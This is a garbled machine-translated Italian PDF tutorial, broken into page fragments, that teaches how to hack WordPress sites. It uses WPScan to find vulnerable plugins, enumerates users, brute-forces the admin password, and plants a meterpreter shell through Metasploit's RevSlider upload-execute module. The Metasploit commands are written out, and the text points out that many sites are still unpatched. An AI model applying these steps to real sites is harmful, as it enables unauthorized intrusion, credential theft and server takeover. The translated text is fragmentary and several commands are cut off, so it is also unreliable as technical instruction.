Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
Pagina | 1
E-mail : mr.mansoori@yahoo.com
Machine Translated by Google
Pagina | 2
In questo tutorial, ti mostrerò come utilizzare WPScan e Metasploit per hackerare un sito Web WordPress
facilmente. Imparerai come scansionare i siti WordPress per potenziali vulnerabilità, di cui approfittare
vulnerabilità per possedere la vittima, enumerare gli utenti di WordPress, account WordPress di forza bruta,
e carica la famigerata shell meterpreter sul sistema del target usando Metasploit Framework.
• Come utilizzare Metasploit per sfruttare una vulnerabilità critica del plug-in scoperta da
WPScan
Apri WPScan
Puoi aprire un terminale e digitare wpscan o andare su Applicazioni > Applicazione Web
Pagina | 3
La prima cosa da fare prima è assicurarsi che il database delle vulnerabilità di WPScan sia aggiornato.
wpscan --aggiornamento
Pagina | 4
Machine Translated by Google
Pagina | 5
Digita il comando successivo nel terminale per scansionare potenzialmente il sito Web di destinazione
vulnerabilità sfruttabili:
Pagina | 6
Machine Translated by Google
Pagina | 7
Come possiamo vedere, WPScan ha scoperto vari fatti sul sito Web del target inclusi e non
limitato a:
pingback DDoS.
• Viene identificata la versione core di WordPress: 2.0.1
Azione Bypass
Pagina | 8
Il Rosso! segno si riferisce a un componente specifico di un sito che è vulnerabile allo sfruttamento.
Machine Translated by Google
Pagina | 9
• Modulo di contatto vulnerabile con bypass di sicurezza, caricamento file RCE disponibile
• LAyerSlider vulnerabile con un CSRF di modifica dello stile, file di attraversamento del percorso remoto
È importante notare che anche quando WPScan non è in grado di determinare una versione di un plug-in specifico, esso
stamperà un elenco di tutte le potenziali vulnerabilità. È utile prendersi il tempo per rivedere, visitare
i siti di riferimento individualmente ed eseguire questi exploit per determinare se il sito di destinazione lo è
vulnerabile a loro o meno. Solo perché non è possibile determinare una versione del plug-in non significa che il file
Pagina | 10
È utile prendersi del tempo per esaminare le vulnerabilità, visitare i siti di riferimento individualmente e
eseguire questi exploit per determinare se il sito di destinazione è vulnerabile o meno. Solo
poiché non è possibile determinare una versione del plug-in non significa che il sito non sia vulnerabile.
• https://wpvulndb.com
• https://packetstormsecurity.com
• https://www.exploit-db.com
• https://cve.mitre.org
• http://www.securityfocus.com
• http://cxsecurity.com
Un esempio interessante
Pagina | 11
• Caricamento shell
Ad esempio, possiamo utilizzare Slider Revolution Upload Execute Exploit tramite Metasploit.
Metasploit ha già questo exploit pronto per l'uso per il tuo piacere.
Lo strumento di enumerazione utente/account di WordPress integrato in WPScan viene distribuito per ottenere a
elenco degli utenti WordPress registrati dal sito Web del target.
L'enumerazione degli utenti è fondamentale quando un hacker deve ottenere l'accesso a un determinato target tramite
Lo strumento di enumerazione degli utenti WPScan eseguirà la scansione del sito di destinazione per gli autori di WordPress e
nomi utente.
Pagina | 12
• Due account utente, in particolare il più importante: admin (il nome dell'amministratore predefinito è rimasto
invariato)
• Il secondo account può possedere privilegi di amministratore, può forzare entrambi contemporaneamente se necessario.
Digita il comando successivo nel terminale per forzare bruta la password per l'amministratore utente:
elenco di parole e posizione a tua scelta) –username admin (il nome utente del tuo target) –threads 2
Per una versione pulita senza quelle fastidiose parentesi che ho appena usato, ecco il comando:
admin – thread 2
Alla fine, potresti vedere la password elencata nel terminale accanto all'ID di accesso.
Machine Translated by Google
Pagina | 13
Cordiali saluti, anche se questa vulnerabilità del plug-in RevSlider è stata corretta, molti WordPress
i siti Web là fuori non hanno ancora aggiornato il loro plug-in RevSlider, il che li rende suscettibili
• revslider di ricerca
• utilizzare exploit/unix/webapp/wp_revslider_upload_execute
• mostra le opzioni
Machine Translated by Google
Pagina | 14
È necessario impostare l'URL del sito Web di destinazione utilizzando il comando successivo:
set rhost 127.0.0.1/targetsiteurl.com (sostituisci l'indirizzo IP con l'IP del sito o semplicemente sostituisci
Devi impostare il percorso di base dell'URI del tuo target per la sua applicazione WordPress usando il seguente
comando:
set targeturi /wordpress (sostituisci /wordpress con il percorso della directory individuale se WordPress non lo è
installato in /)
Dobbiamo impostare un carico utile. Nella nostra dimostrazione, utilizziamo il famigerato payload meterpreter per pwn
il nostro obiettivo.
• mostra le opzioni
Machine Translated by Google
Pagina | 15
Assicurati che rhost per entrambe le opzioni del modulo e del carico utile sia riempito con l'IP del sito di destinazione
indirizzo/URL.
terminale.
Riceveresti il messaggio di risposta: "Il bersaglio sembra essere vulnerabile". Lo sappiamo già
Ora per ottenere la shell meterpreter sul sistema del bersaglio, digita semplicemente il comando "exploit" in
il terminale.
contenuto/plugin/revslider/temp/upload“
• "oCDNSJ.php eliminato"
Machine Translated by Google
Pagina | 16
• "Eliminato ../revslider.zip"
Mr.mansoori@yahoo.com
Instagram.com/Behrouz_mansoori